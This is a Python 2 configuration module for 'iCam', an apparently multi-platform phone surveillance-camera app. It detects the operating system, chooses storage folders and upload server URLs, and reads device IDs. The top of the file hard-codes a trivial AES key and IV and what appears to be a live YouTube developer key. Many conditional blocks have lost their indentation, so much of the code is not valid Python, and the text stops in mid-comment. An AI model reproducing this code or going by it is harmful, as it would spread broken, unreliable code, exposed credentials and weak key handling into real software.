AES_SECRET_KEY = "12345678901234567890123456789012"
# AES_SECRET_KEY = AES_SECRET_KEY[:32]
# From C:\Python25\Lib\site-packages\gdata\tlslite\utils\cipherfactory.py
# "param IV: A 16 byte string"
AES_IV = "1234567890123456"
# Used in IQEnginesPhotoUpload().
IQE_KEY = ""
IQE_SECRET = ""
# Used in ConnectToYouTubeGData(), YouTubeVideoUpload()
#YOUTUBE_TEST_CLIENT_ID = ""
YOUTUBE_TEST_CLIENT_ID = "ytapi-pythonclientlibrary_servicetest"
# Used in ConnectToYouTubeGData(), YouTubeVideoUpload()
# Mobile ReVival YouTube developer key
#youtubeDeveloperKey = ""
youtubeDeveloperKey = "AI39si6eJ7T_TA4Xwl-jZkLDjxi83JPvhgt46Q6k_QfCRWbpW5izuvHCDIw6hjC_CDzyhfPIbisquvtcj0mlotr6ejJGSXA_lg"
"""
It seems that the main overhead is not the display but the storage, Inet
transmission and maybe the detection algorithm.
"""
NUM_FRAMES_TO_UPDATE_VIEWFINDER_EVERY = 1 # 10
startViewfinderBeforeTakingPhoto = 0 # 1
ADD_VIDEO_TO_PLAYLIST = False
BATTERY_LEVEL_THRESHOLD = 40
# PyUIQ 0.2?? uses Python 2.2.2 (PyS60 1.3.18).
# The modules telephone, sysinfo, camera, audio are not working.
###############################################################################
###############################################################################
###############################################################################
###########################PLATFORM DEPENDENT ISSUES###########################
###############################################################################
###############################################################################
import os
import sys
# TODO (low-priority): discover more reliable if we run on RPi or not
# See http://www.raspberrypi.org/forums/viewtopic.php?f=32&t=54413 for other ideas - /proc/cpuinfo
try:
    # Presence of the RPi.GPIO package doubles as a Raspberry Pi detector.
    import RPi.GPIO
    RASPBIAN_OS = True
except:
    RASPBIAN_OS = False
# sys.path.insert(0, "E:\\lib.zip")
#import traceback #!!!!TODO: remove
# Android detection: SL4A exposes the "android" module while QPython ships
# it as "androidhelper"; either way we keep a droid RPC proxy in myDroid.
try:
    try:
        import android
        #print "dir(android) =", dir(android)
        myDroid = android.Android()
        ANDROID_OS_QPYTHON = False
    except:
        #traceback.print_exc()
        import androidhelper
        myDroid = androidhelper.Android()
        ANDROID_OS_QPYTHON = True
    ANDROID_OS = True
    #myDroid.makeToast("Alex test.") # This works here OK
except:
    #traceback.print_exc()
    #print "Couldn't import androidhelper module."
    ANDROID_OS = False
# iOS detection: the PyObjC bridge module is only present on iOS builds.
try:
    import objc
    iOS_PYOBJC = True
except:
    #print("Couldn't import the android module.")
    iOS_PYOBJC = False
"""
We add lib_std.zip in the sys.path to be able to import the GData API
library, which we install apriori in the current directory.
"""
# sys.path.insert(0, os.getcwd())
# sys.path.insert(0, os.path.join(os.getcwd(), "gdata.zip"))
#if ANDROID_OS == False:
if ANDROID_OS:
    # On Android no extra library archive is added to sys.path.
    pass
elif iOS_PYOBJC:
    # So far, sys.path[0] was
    # '/private/var/stash/Applications.k14UJu/HelloPython.app' and
    # os.getcwd() returns "/". But I fear!!!! that this is not always
    # like this.
    # sys.path.insert(0, os.path.join(sys.path[0], "lib_std.zip"))
    sys.path.append(os.path.join(sys.path[0], "lib_std.zip"))
else:
    # This includes Symbian, in general (although PyS60 1.4.5 can't read the ZIP)
    sys.path.insert(0, os.path.join(os.getcwd(), "lib_std.zip"))
# print "sys.path = ", sys.path
# sys.stdout.flush()
# Symbian feature flags; the try below refines them from
# e32.s60_version_info when the e32 module imports successfully.
SYMBIAN_OS = False
SYMBIAN_S60_OS = True
SYMBIAN_UIQ_OS = False # True
SYMBIAN_S60_2ND_ED = False
SYMBIAN_S60_3RD_ED = False
SYMBIAN_1 = False
SYMBIAN_3 = False
try:
    import e32
    # Both PyS60 and PyUIQ have the e32 module --> SYMBIAN_OS = True for
    # both S60 and UIQ.
    SYMBIAN_OS = True
    S60_EDITION = e32.s60_version_info
    if ((S60_EDITION[0] == 5) and (S60_EDITION[1] == 3)) or \
            ((S60_EDITION[0] == 5) and (S60_EDITION[1] == 2)):
        # Symbian Belle
        # What is the value for Symbian Anna?
        SYMBIAN_3 = True
    else:
        SYMBIAN_3 = False
    # 5.0/5.1 correspond to Symbian^1 here.
    if S60_EDITION[0] == 5 and S60_EDITION[1] < 2:
        SYMBIAN_1 = True
    else:
        SYMBIAN_1 = False
    if S60_EDITION[0] == 3:
        SYMBIAN_S60_3RD_ED = True
    else:
        SYMBIAN_S60_3RD_ED = False
    if S60_EDITION[0] == 2:
        SYMBIAN_S60_2ND_ED = True
    else:
        SYMBIAN_S60_2ND_ED = False
except:
    """
    if MY_DEBUG_STDERR:
        traceback.print_exc()
        sys.stderr.flush()
    """
    # print "Couldn't import Symbian PyS60 module e32."
    # Failing to import e32 means we are not on Symbian at all.
    SYMBIAN_OS = False
    SYMBIAN_S60_OS = False
    SYMBIAN_UIQ_OS = False
# Windows flags: WinCE is heuristically detected by the presence of a
# "/Storage Card" mount; any other win32 platform is desktop Windows.
WINDOWS_OS = False
WINDOWS_CE_OS_PYTHONCE = False
try:
    if sys.platform == "win32":
        if os.path.exists("/Storage Card"):
            print "Running on Win32 (WinCE)"
            WINDOWS_CE_OS_PYTHONCE = True
        else:
            print "Running on Win32 (Win for desktop :) )"
            WINDOWS_OS = True
except:
    print("Error around sys.platform.")
#UNIX_OS = True
UNIX_OS = False
###############################################################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
##############################START PROGRAM####################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
# Important vars:
"""
I currently use this for Nokia 6680 and N95, when in BT client mode, since I want:
- not to resize photos but send them original (since 6680 has little mem
and might go Out of memory),
- the state.bin and log files are stored on E:
BUT
- the photos need to be saved in D: since E: sometimes gives
error messages
- to erase the media file after sending it (even if not successful??).
This instructs phone not to resize photos taken and send them
at original resolution directly.
"""
MODE_FOR_PHONE_WITH_LITTLE_RAM_AND_UNRELIABLE_MEM_CARD = False
MY_DEBUG_STDOUT = True
MY_DEBUG_STDERR = True
MY_DEBUG_STDERR_2 = True
# For uploaded log messages
MY_DEBUG_UPLOAD_MSG = True
#USE_ICAM_SERVER = True
#USE_ICAM_SERVER = False
MEGA_BYTE = 1024 * 1024
# import os.path
if SYMBIAN_OS:
#try:
import appuifw
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
# Even if PyUIQ 2.0 has libs\sysinfo.py it doesn't have _sysinfo.pyd
import sysinfo
#except:
# DebugPrintErrorTrace()
def DoesDriveExist(driveStr):
    """Return True when driveStr (e.g. "E:") is a usable Symbian drive.

    A drive counts as existing only when its root path exists, e32 lists
    the drive, and sysinfo reports free-space information for it.
    """
    # Inspired from IYouIt :)
    driveU = unicode(driveStr)
    if not os.path.exists(driveStr + "\\"):
        return False
    if driveU not in e32.drive_list():
        return False
    # Same membership test as the Python-2-only dict.has_key().
    return driveU in sysinfo.free_drivespace()
# DoesDriveExist("E:")
LOCAL_DRIVE = ""
LOCAL_FOLDER_TEMP = None
# define ANDROID_OS
# ifdef ANDROID_OS
# endif
if SYMBIAN_OS:
# if SYMBIAN_OS and SYMBIAN_S60_OS:
LOCAL_FOLDER_TEMP = "D:/iCam"
if SYMBIAN_UIQ_OS:
if os.path.exists("D:\\"):
LOCAL_DRIVE = "D:"
elif DoesDriveExist("E:"):
LOCAL_DRIVE = "E:"
elif DoesDriveExist("F:"):
LOCAL_DRIVE = "F:"
elif DoesDriveExist("C:"):
appuifw.note(u"No E or F drives found. Using drive C to store " \
"iCam folder.", "info")
LOCAL_DRIVE = "C:"
else:
appuifw.note(u"There are no C, E or F drives on this system :O ...",
"info")
LOCAL_DRIVE = ""
elif ANDROID_OS:
# """
if os.path.exists("/mnt/sdcard/extsd"): # /sdcard/extsd
LOCAL_DRIVE = "/mnt/sdcard/extsd"
elif os.path.exists("/mnt/sdcard/external_sd"):
LOCAL_DRIVE = "/mnt/sdcard/external_sd"
elif os.path.exists("/sdcard"):
LOCAL_DRIVE = "/sdcard"
else:
LOCAL_DRIVE = "/" #!!!! should it be "" - cause we add "/iCam", etc at it?!!!!
elif iOS_PYOBJC:
# It seems /tmp is erased on iOS upon reboot :)
# if os.path.exists("/tmp"):
# LOCAL_DRIVE = "/tmp"
# The bigger drive is at /private/var which is sym-linked at /var
# (df -H reports:
# /dev/disk0s2 3.6G 287M 3.3G 9% /private/var)
# Note: the CameraRoll stores photos in /var/mobile/Media/DCIM/100APPLE/
if os.path.exists("/var/mobile"):
LOCAL_DRIVE = "/var/mobile"
else:
# It seems I don't have access to create "/iCam"!!!!
LOCAL_DRIVE = "/"
elif WINDOWS_OS:
if os.path.exists("Z:\\"):
LOCAL_DRIVE = "Z:"
else:
LOCAL_DRIVE = "C:"
if os.path.exists("R:\\iCam"):
LOCAL_FOLDER_TEMP = "R:\\iCam"
elif os.path.exists("Z:\\iCam"):
LOCAL_FOLDER_TEMP = "Z:\\iCam"
else:
LOCAL_FOLDER_TEMP = "C:\\iCam"
elif UNIX_OS:
LOCAL_DRIVE = "." # "./"
elif WINDOWS_CE_OS_PYTHONCE:
if os.path.exists("/Storage Card"):
# Note: \Storage Card/iCam/Unsent works on PythonCE
# (e.g., Z:\1PhD\ReVival\Logs\WinCE\2011_03_21)
# (but \Storage Card/iCam/Unsent/2011_03_20_23_51_49_000.txm
# doesn't - e.g., in
# Z:\1PhD\ReVival\Logs\WinCE\WiFi_not_working\stderr_2011_03_20_23_51_45.txt)
LOCAL_DRIVE = "/Storage Card"
else:
#LOCAL_DRIVE = "/" # "\\My Device"
LOCAL_DRIVE = "" # "\\My Device"
elif RASPBIAN_OS:
LOCAL_DRIVE = "/home/pi" # "./"
LOCAL_FOLDER_TEMP = "/run" #/1 and do also: os.system("sudo mkdir %s" % TEMP_FOLDER) and os.system("sudo chmod 777 %s" % TEMP_FOLDER)
ICAM_APP_TITLE = u"iCam"
MENU_SELECT_PREFIX = "* "
# LOCAL_FOLDER = "E:/ReVival"
# LOCAL_FOLDER = "F:/iCam"
LOCAL_FOLDER = LOCAL_DRIVE + "/iCam"
if LOCAL_FOLDER_TEMP is None:
LOCAL_FOLDER_TEMP = LOCAL_FOLDER
"""
This is useful in case we have pauseInterval == 0, since it allows very fast
writing of files (JPEGs and .smf, etc).
"""
# LOCAL_FOLDER = "D:/iCam"
LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER + "/Media"
LOCAL_FOLDER_SENT_LOGS = LOCAL_FOLDER + "/LogsSent"
WINCE_MEDIA_FOLDER = "/Storage Card/DCIM/100MEDIA"
WINCE_SENT_MEDIA_FOLDER = WINCE_MEDIA_FOLDER + "/Sent"
ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ = False
LOCAL_FOLDER_UNSENT_FILES = LOCAL_FOLDER + "/Unsent"
STATE_FILENAME = "state.bin"
STATE_BACKUP_EXTENSION = ".bak"
STATE_PATH_FILENAME = LOCAL_FOLDER + "/" + STATE_FILENAME
STATE_PATH_FILENAME_BACKUP = STATE_PATH_FILENAME + STATE_BACKUP_EXTENSION
LOCAL_CONFIG_FILENAME = "iCam.cfg"
LOCAL_CONFIG_PATH_FILENAME = LOCAL_FOLDER + "/" + LOCAL_CONFIG_FILENAME
STDERR_FILENAME_PREFIX = "stderr_"
STDOUT_FILENAME_PREFIX = "stdout_"
INTRANET_SERVER = False
#INTRANET_SERVER = True
USE_ICAMSRV_GAE = False
#USE_ICAMSRV_GAE = True
ICAM_GAE_SERVER_NAME = "icamsrv.appspot.com"
if INTRANET_SERVER == False:
if USE_ICAMSRV_GAE == False:
ICAM_SERVER_NAME = "titansusu.go.ro" #"mobile-revival.110mb.com"
WEB_FOLDER = "/ReVival"
"""
ICAM_SERVER_NAME = "alexsusu.110mb.com"
WEB_FOLDER = "/iCam"
"""
else:
ICAM_SERVER_NAME = ICAM_GAE_SERVER_NAME
WEB_FOLDER = ""
else:
if USE_ICAMSRV_GAE == False:
# ICAM_SERVER_NAME = "83.149.75.83"
# ICAM_SERVER_NAME = "aes123.110mb.com"
"""
ICAM_SERVER_NAME = "192.168.2.205" # Titan WiFi
WEB_FOLDER = "/ReVival"
"""
pass
else:
ICAM_SERVER_NAME = "localhost:8080"
WEB_FOLDER = ""
# WEBPAGE_UL_GZIPPED_STATE_AND_FILE = WEB_FOLDER + "/UploadBinary.php"
# WEBPAGE_UL_GZIPPED_STATE_AND_FILE = WEB_FOLDER + "/UploadStateAndFile.php"
if USE_ICAMSRV_GAE:
WEBPAGE_UL_GZIPPED_STATE_AND_FILE = WEB_FOLDER + "/proxyyoutube"
else:
WEBPAGE_UL_GZIPPED_STATE_AND_FILE = WEB_FOLDER + \
"/UploadGzippedStateAndFile.php"
WEBPAGE_UL_GZIPPED_STATE_AND_FILE_PROXY_YOUTUBE = "/proxyyoutube"
WEBPAGE_UL_GZIPPED_FILE = WEB_FOLDER + "/UploadFile.php"
# WEBPAGE_DL_GZIPPED_TEXT
WEBPAGE_DL_GZIPPED_FILE = WEB_FOLDER + "/DownloadFile.php"
# WEBPAGE_UL_GZIPPED_TEXT = "/video_surveillance_mobile_text.php"
if USE_ICAMSRV_GAE:
WEBPAGE_UL_GZIPPED_TEXT = WEB_FOLDER + "/uploadgzippedtext"
else:
WEBPAGE_UL_GZIPPED_TEXT = WEB_FOLDER + "/UploadGzippedText.php"
# WEBPAGE_DL_COMMAND_FILE = "/WiSurveillance/cmd.txt"
# WEBPAGE_DL_COMMAND_FILE = "/cmd.txt"
# WEBPAGE_DL_COMMAND_FILE = "/cmd.php"
WEBPAGE_DL_COMMAND_FILE = WEB_FOLDER + "/cmd.php"
# BT_OBEX_FILENAME_PREFIX = "sLog_"
#BT_OBEX_FILENAME_PREFIX = "iCam_"
BT_OBEX_FILENAME_PREFIX = "iC_"
# Used when NEW_BT_FORMAT == False:
BT_OBEX_FILENAME_PREFIX_TYPE_CMD = "CMD_"
BT_OBEX_FILENAME_PREFIX_TYPE_FIL = "FIL_"
BT_OBEX_FILENAME_PREFIX_TYPE_SMF = "SMF_"
BT_OBEX_FILENAME_PREFIX_TYPE_TXT = "TXT_"
COMMANDS_FILENAME = "cmd.txt"
# These are extensions for files transferred via Internet (not BT):
EXTENSION_COMMAND_MESSAGE = ".cmd"
# "fil" comes from arbitrary file - used for Unsent, Bluetooth, etc
EXTENSION_ARBITRARY_FILE = ".fil"
# "smf" comes from state and media file. These files are used for
# Unsent (own files and for Bluetooth client).
EXTENSION_STATE_AND_MEDIA_FILE = ".smf"
# Text message (normally should be compressed, that's why it's not ".txt").
EXTENSION_TEXT_MESSAGE = ".txm"
# These are extensions for files transferred via BT:
BT_OBEX_EXTENSION_TXT = ".txt"
BT_OBEX_EXTENSION_CMD = ".cmd.txt"
BT_OBEX_EXTENSION_TIM = ".tim" # time sync message
##
#BT_OBEX_EXTENSION_LIST_CMD = [EXTENSION_COMMAND_MESSAGE]
BT_OBEX_EXTENSION_LIST_CMD = [BT_OBEX_EXTENSION_CMD]
BT_OBEX_EXTENSION_LIST_FIL = [EXTENSION_ARBITRARY_FILE]
#BT_OBEX_FILENAME_EXTENSION_TYPE_SMF = [".jpg", ".png", ".3gp", ".mp4", ".amr"]
BT_OBEX_EXTENSION_LIST_SMF = [".jpg", ".png", ".3gp", ".mp4", ".amr"]
#BT_OBEX_EXTENSION_LIST_TXT = [EXTENSION_TEXT_MESSAGE]
BT_OBEX_EXTENSION_LIST_TXT = [BT_OBEX_EXTENSION_TXT]
changedConserveEnergy = False
conserveEnergy = False
# 0 - None, 1 - All; 2 - wo .txm
saveUnsentPackets = 0
# saveUnsentPackets = True
"""
uploadUnsentData means:
0 - send none;
1 - send unsent files from Unsent (excepting .txm unsent files);
2 - send unsent logs;
3 - send ALL (excepting .txm unsent files)
"""
uploadUnsentData = 0
NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS = 1 # 10
"""
Sensing accelerator (it is called 35?? times / sec) and rotation slows
down iCam.
"""
logAccelerometerAndRotationSensors = False
startAutomatically = 0 # False
startButtonPressed = False
reactiveLoopIsStarted = False
"""
# It is stored as an int in the iCam state.
Note that we use it also to store for fact IMEI_N82 phone sent (or not) to
IMEI_6680 the fact that its charger power went down (we assume both phones
are connected at the same "power source"), in SleepAndPetWatchdog().
"""
reactiveLoopOpsIndex = 0
sentBTMessageTo6680 = 0
"""
Map from BT-MAC-address (NOT btClientDeviceId) to OPP-service-port number
"""
#bluetoothServerOPPServicePort = -1
bluetoothServerOPPServicePort = {}
###############################################################################
###############################################################################
###############################################################################
###########################STATE VARIABLES#####################################
###############################################################################
###############################################################################
import binascii
import time
import traceback
def DebugPrint(aText):
    """Best-effort print of aText to stdout; no-op unless MY_DEBUG_STDOUT."""
    try:
        if MY_DEBUG_STDOUT:
            print aText
            sys.stdout.flush()
    except:
        # Diagnostics must never crash the app (e.g. stdout unavailable).
        pass
def DebugPrintErrorTrace():
    """Best-effort dump of the current exception traceback to stderr."""
    try:
        if MY_DEBUG_STDERR:
            traceback.print_exc()
            sys.stderr.flush()
    except:
        # Error reporting must never raise itself.
        pass
if WINDOWS_CE_OS_PYTHONCE:
"""
From http://stackoverflow.com/questions/51658/cross-platform-space-remaining-on-volume-using-python
(see also http://stackoverflow.com/questions/2973480/available-disk-space-on-an-smb-share-via-python
and http://bytes.com/topic/python/answers/609682-how-check-remaining-hard-drive-space-windows)
"""
try:
import ctypes
DebugPrint("Imported ctypes.")
"""
From http://mail.python.org/pipermail/pythonce/attachments/20080906/e52a55e2/attachment-0001.py
(see also http://old.nabble.com/Can-I-execute-external-programs-from-PythonCe--td19307784.html#a19357083)
"""
CreateProcess = ctypes.cdll.coredll.CreateProcessW
WaitForSingleObject = ctypes.cdll.coredll.WaitForSingleObject
GetExitCodeProcess = ctypes.cdll.coredll.GetExitCodeProcess
DWORD = HANDLE = ctypes.c_ulong
except:
DebugPrintErrorTrace()
# Execute a new process and wait until it finishes - because of _wait_process(hPro)
def WinSpawn(path, args):
    """Run an external program via coredll CreateProcessW and wait for it.

    :param path: executable path (made absolute before spawning)
    :param args: tuple/list of command-line arguments
    :returns: the process exit code, or None when spawning fails

    NOTE(review): the nested execv/execve helpers are defined but never
    called from this function; presumably they are kept as drop-in
    replacements for os.execv/os.execve on PythonCE — confirm.
    """
    # ctypes structure mirroring Win32 PROCESS_INFORMATION.
    class _PI(ctypes.Structure):
        global DWORD, HANDLE
        _fields_ = [("hPro", HANDLE), ("hTh", HANDLE), ("idPro",
                    DWORD), ("idTh", DWORD)]
    def _create_process(cmd, args):
        # Thin wrapper over CreateProcessW; returns the process handle.
        pi = _PI()
        CreateProcess(
            unicode(cmd),
            unicode(args),
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            ctypes.byref(pi)
        )
        return pi.hPro
    def _wait_process(hPro):
        # 0xffffffff is the Win32 INFINITE timeout.
        WaitForSingleObject(hPro, ctypes.c_ulong(0xffffffff))
        return GetExitCodeProcess(hPro)
    def _quote(s):
        # Quote an argument only when it contains spaces.
        if " " in s:
            return '"%s"' % s
        return s
    def MyJoin(args, myChar):
        # Hand-rolled join of quoted args (the generator-expression form
        # crashes pyobfuscate, per the comment below).
        myRes = ""
        for i in range(len(args) - 1):
            myRes += _quote(args[i]) + myChar
        if len(args) >= 1:
            myRes += _quote(args[len(args) - 1])
        return myRes
    def execv(path, args):
        if not type(args) in (tuple, list):
            raise TypeError, "execv() arg 2 must be a tuple or list"
        path = os.path.abspath(path)
        """
        #This crashes pyobfuscate
        args = " ".join(_quote(arg) for arg in args)
        _create_process(path, args)
        """
        myArgs = MyJoin(args, " ")
        _create_process(path, myArgs)
    def execve(path, args, env):
        # env is accepted for os.execve compatibility but ignored.
        execv(path, args)
    DebugPrint("Entered WinSpawn().")
    try:
        # Was called systema before - def systema(path, args):
        if not type(args) in (tuple, list):
            raise TypeError, \
                "systema() arg 2 must be a tuple or list"
        path = os.path.abspath(path)
        """
        args = " ".join(_quote(arg) for arg in args)
        hPro = _create_process(path, args)
        """
        myArgs = MyJoin(args, " ")
        hPro = _create_process(path, myArgs)
        return _wait_process(hPro)
    except:
        DebugPrintErrorTrace()
elif WINDOWS_OS:
try:
import ctypes
except:
DebugPrintErrorTrace()
###############################################################################
###############################################################################
###############################################################################
###############################################################################
# This is for the case when there is no SIM card in the cellphone.
NO_GSM_SIGNAL_STRENGTH = -1234
signalStrength = NO_GSM_SIGNAL_STRENGTH
signalUnits = ""
accessPointName = u""
"""
If accessPointRetryConnect is True it means that connection to the AP
accessPointName was not successful. And this leads to retrying
connection to the AP.
"""
accessPointRetryConnect = False
def NoInternetConnection():
    """Return True when no usable Internet access point is available."""
    global accessPointName, accessPointRetryConnect
    # Either the last connect attempt to the AP failed...
    if accessPointRetryConnect == True:
        return True
    # ...or no access point was ever selected.
    return accessPointName == u""
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
import globalui
def DisplayNote(aText, waitTime=2.0):
    """Show a short notification to the user on the current platform.

    waitTime selects the Symbian note style: 2.0 (the default) shows a
    standard confirmation note, -1.0 shows a global "wait" note.  On
    Android a Toast is shown and we sleep waitTime seconds so it stays
    visible.  On any other platform this is a no-op.
    """
    if SYMBIAN_OS:
        if waitTime == 2.0:
            appuifw.note(unicode(aText), "conf")
        elif waitTime == -1.0:
            # Global note; it shows a progress bar and a Cancel button
            # instead of OK, but survives outside the app UI.
            globalui.global_note(unicode(aText), "wait")
    elif ANDROID_OS:
        try:
            myDroid.makeToast(aText)
            # The Toast itself lasts about 2 seconds regardless.
            time.sleep(waitTime)
        except:
            DebugPrintErrorTrace()
def DialogMultipleChoices(title, comboList, initialChoice):
    """Show a single-choice alert dialog and return the chosen index.

    title: dialog title.
    comboList: list of choice strings.
    initialChoice: index of the initially selected item.

    Implemented only for Android (SL4A); returns the selected index, 0 on
    any dialog error, and (implicitly) None on other platforms.
    """
    if ANDROID_OS:
        try:
            myDroid.dialogCreateAlert(title)
            # See http://www.mithril.com.au/android/doc/UiFacade.html#dialogSetSingleChoiceItems
            myDroid.dialogSetSingleChoiceItems(comboList, int(initialChoice))
            myDroid.dialogSetPositiveButtonText("OK")
            myDroid.dialogShow()
            # dialogGetResponse() blocks until the user answers and yields
            # e.g. {u'which': u'positive'} for the OK button;
            # dialogGetSelectedItems() yields e.g.
            # Result(id=81, result=[1], error=None).
            DebugPrint("DialogMultipleChoices(): " \
                        "myDroid.dialogGetResponse() = %s\n" % \
                        str(myDroid.dialogGetResponse()) +
                        "DialogMultipleChoices(): " \
                        "myDroid.dialogGetSelectedItems() = %s" % \
                        str(myDroid.dialogGetSelectedItems()))
            # !!!!TODO: think if necessary - Don't allow reading events:
            #myAllowReadEvents = False
            res = int(myDroid.dialogGetSelectedItems().result[0])
            #Once I got here: TypeError: int() argument must be a string or a number, not 'dict'
            return res
        except Exception:
            DebugPrintErrorTrace()
            return 0
def DialogGetInput(aTitle, aTextMore, aInitVal):
    """Prompt the user for a line of text and return it as a string.

    aTitle: dialog title.
    aTextMore: extra prompt text appended to the title (Symbian) or shown
        in the dialog (Android).
    aInitVal: initial value shown in the input field.

    Returns "" when the user entered nothing, when the dialog failed, or
    on platforms without a dialog implementation.
    """
    global myAllowReadEvents
    # Initialize up front so we never hit an unbound local: previously a
    # NameError occurred if no platform branch matched, or if the Android
    # dialog raised before assigning resStr.
    resStr = ""
    if SYMBIAN_OS:
        resStr = appuifw.query(unicode(aTitle) + aTextMore, "text",
                               unicode(aInitVal))  # "number", "code", etc
    elif ANDROID_OS:
        try:
            # Don't allow reading events while the dialog is up:
            myAllowReadEvents = False
            resStr = myDroid.dialogGetInput(aTitle, aTextMore, aInitVal).result
            if (resStr is None) or (resStr == []):
                resStr = ""
            DebugPrint("DialogGetInput(): resStr = %s." % resStr)
            myAllowReadEvents = True
        except Exception:
            # NOTE(review): on failure myAllowReadEvents stays False, as in
            # the original code - confirm whether it should be re-enabled.
            DebugPrintErrorTrace()
    return resStr
# subprocess is only needed on iOS (PyObjC), where GetDeviceId_iPhone()
# shells out to the external "deviceinfo" tool.
if iOS_PYOBJC:
    import subprocess
def GetSerialAndRevision_Raspbian():
    """
    Return the Raspberry Pi CPU serial as "RPi" + 16 hex chars.

    Inspired from
    https://raspberrypi.stackexchange.com/questions/2086/how-do-i-get-the-serial-number
    From http://elinux.org/RPi_HardwareHistory - for revision number
    cat /proc/cpuinfo

    On any read error the constant "ERROR000000000" is returned instead.
    """
    DebugPrint("Entered GetSerialAndRevision_Raspbian()")
    # Extract serial from cpuinfo file
    cpuserial = "RPi"  #"0000000000000000"
    try:
        # "with" guarantees the file is closed even if iteration raises
        # (the old code leaked the handle on error).
        with open("/proc/cpuinfo", "r") as f:
            for line in f:
                # Looking for the "Serial\t\t: <16 hex chars>" line.
                if line[0:6] == "Serial":
                    cpuserial += line[10:26]
                    break
    except Exception:
        cpuserial = "ERROR000000000"
    DebugPrint("GetSerialAndRevision_Raspbian(): cpuserial = %s" % cpuserial)
    return cpuserial
def GetDeviceId_iPhone():
    """Return the device id (IMEI) on iOS.

    Runs the external "deviceinfo -i" tool with its stdout redirected into
    LOCAL_FOLDER/IMEI.txt, then reads that file back and strips trailing
    whitespace. Falls back to the IMEI_IOS constant if the file cannot be
    read.
    """
    try:
        DebugPrint("GetDeviceId(): calling subprocess.call().")
        # subprocess.call() blocks until the tool finishes - see
        # http://stackoverflow.com/questions/6441807/spawn-a-new-non-blocking-process-using-python-on-mac-os-x
        # "with" makes sure the redirect target is flushed and closed
        # before we read it back below (the old code leaked the handle
        # if subprocess.call() raised).
        with open(LOCAL_FOLDER + "/IMEI.txt", "wb") as fOutput:
            subprocess.call([sys.path[0] + "/deviceinfo", "-i"],
                            stdout=fOutput, stderr=None)
    except Exception:
        traceback.print_exc()
        sys.stderr.flush()
    try:
        with open(LOCAL_FOLDER + "/IMEI.txt", "r") as fInput:
            myRes = fInput.read()
        # The tool terminates its output with whitespace/newline.
        myRes = myRes.rstrip(" \r\n")
    except Exception:
        DebugPrintErrorTrace()
        myRes = IMEI_IOS
    return myRes
def GetDeviceId():
    """
    Returns the deviceId of the running device.
    !!IMPORTANT: deviceId should not have '_' chars in it, because I am using
    '_' as separator char in filenames containing deviceId also.
    deviceId has normally 15-17 chars (e.g., "N95N95N95N95N95", "HTCHTCHTCHTCTCR")

    NOTE: if none of the platform flags is set, the function falls through
    and returns None.
    """
    DebugPrint("Entered GetDeviceId()")
    # if SYMBIAN_OS:
    if SYMBIAN_S60_OS:
        # sysinfo.imei() returns unicode string, so we convert to ASCII string.
        return str(sysinfo.imei())
    elif SYMBIAN_UIQ_OS:
        return IMEI_UIQOS
    elif ANDROID_OS:
        # From PhoneFacade
        return str(myDroid.getDeviceId().result)
    elif iOS_PYOBJC:
        return GetDeviceId_iPhone()
    elif WINDOWS_OS:
        return IMEI_WinOS  # Note that this has 14 chars length, not 15
    elif WINDOWS_CE_OS_PYTHONCE:
        # GetIMEI.exe writes the IMEI into LOCAL_FOLDER/IMEI.txt; we spawn
        # it, give it 5 seconds to finish, then read the file back.
        tmpPathFileName = LOCAL_FOLDER + "/GetIMEI.exe"
        # I think we require backslashes (we use \ instead of /).
        tmpPathFileNameWithBackslashes = tmpPathFileName.replace("/", "\\")
        WinSpawn(tmpPathFileNameWithBackslashes, [])
        time.sleep(5.0)
        try:
            # "with" closes the handle even when read() raises.
            with open(LOCAL_FOLDER + "/IMEI.txt", "r") as fInput:
                myRes = fInput.read()
        except Exception:
            DebugPrintErrorTrace()
            myRes = IMEI_WinCEOS
        return myRes
    elif UNIX_OS:
        return IMEI_UNIXOS
    elif RASPBIAN_OS:
        #!!!!TODO: use hostname
        # Reads the CPU serial from /proc/cpuinfo.
        myRes = GetSerialAndRevision_Raspbian()
        return myRes  #str("RPi")
###############################################################################
###############################################################################
###############################################################################
################MOST OF THE STATE VARIABLES START FROM HERE####################
#####################(BUT SOME ARE ALSO DEFINED ABOVE)#########################
###############################################################################
# Note that GetDeviceId() returns an ASCII string.
if ANDROID_OS and ANDROID_OS_QPYTHON:
    deviceId = "ANDROID_OS_QPYTHON_phone"
    # !!!!TODO: QPython, because it doesn't have permissions, GetDeviceId() gives
    # "java.lang.SecurityException: Requires READ_PHONE_STATE: Neither user 10156 nor current process has android.permission.READ_PHONE_STATE."
else:
    deviceId = GetDeviceId()
"""
localPhotoResolution = None
localVideoMode = None
"""
# Two-element lists below are per-camera settings - presumably index 0 is
# the main/back camera and index 1 the secondary/front one; TODO confirm
# against the camera-handling code.
localPhotoResolution = [(0, 0), (0, 0)]  # [(width, height), ...]
localVideoMode = [(0, 0), (0, 0)]  # Example: localVideoMode = [((176, 144), 15.0), ((176, 144), 15.0)]
# modeManagerIsEnabled = True
modeManagerIsEnabled = False
burstModeIsStarted = False
"""
Burst mode take as many frames as possible per second when the viewfinder is
on. This happens when pauseInterval == 0.
"""
motionDetectionIsOn = False
# Detect simple changes in images.
#motionDetectionIsOn = True
# Simply detect noise
#noiseDetectionEnabled = True
# faceDetection, body tracking
# soundDetection #a human talking, a dog barking, a bird singing
"""
IMPORTANT NOTE: In landscape mode, N82 has a resolution of (320, 199) -
surprisingly it seems to be 199, not 200. The rest of 41 pixels is for
the system status.
#This is conserving aspect ratio for (320, 240), as for (176, 144)
# VIEWFINDER_SIZE_ORIG = (293, 240)
"""
if SYMBIAN_OS:
    if SYMBIAN_3:
        VIEWFINDER_SIZE_ORIG = (293, 240)
    else:
        # VIEWFINDER_SIZE_ORIG = (73, 60) #Bad
        VIEWFINDER_SIZE_ORIG = (293, 240)  # Good
else:
    # VIEWFINDER_SIZE_ORIG = (80, 60) #Bad
    # VIEWFINDER_SIZE_ORIG = (176, 144) #Bad
    # This is conserving aspect ratio for (240, 180), as for (176, 144)
    # VIEWFINDER_SIZE_ORIG = (220, 180)
    # (-1, -1) here appears to mean "no fixed viewfinder size" on
